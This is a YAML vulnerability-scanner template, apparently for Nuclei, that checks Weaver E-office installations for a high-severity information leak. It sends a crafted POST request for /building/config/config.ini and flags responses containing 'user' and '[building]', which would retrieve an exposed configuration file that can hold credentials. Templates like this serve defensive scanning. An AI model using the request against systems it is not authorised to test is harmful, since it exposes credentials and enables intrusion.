http:
    - matchers:
        - dsl:
            - status_code==200 && contains_all(body,"user","[building]")
          type: dsl
      raw:
        - |
          POST /building/config/config.ini HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1499.61 Safari/537.36
          Accept: */*
          Accept-Encoding: gzip, deflate
id: weaver-e-office-config-infoleak
info:
    author: SleepingBag945
    name: 泛微 E-office config 信息泄露
    severity: high
    tags:
        - e-office
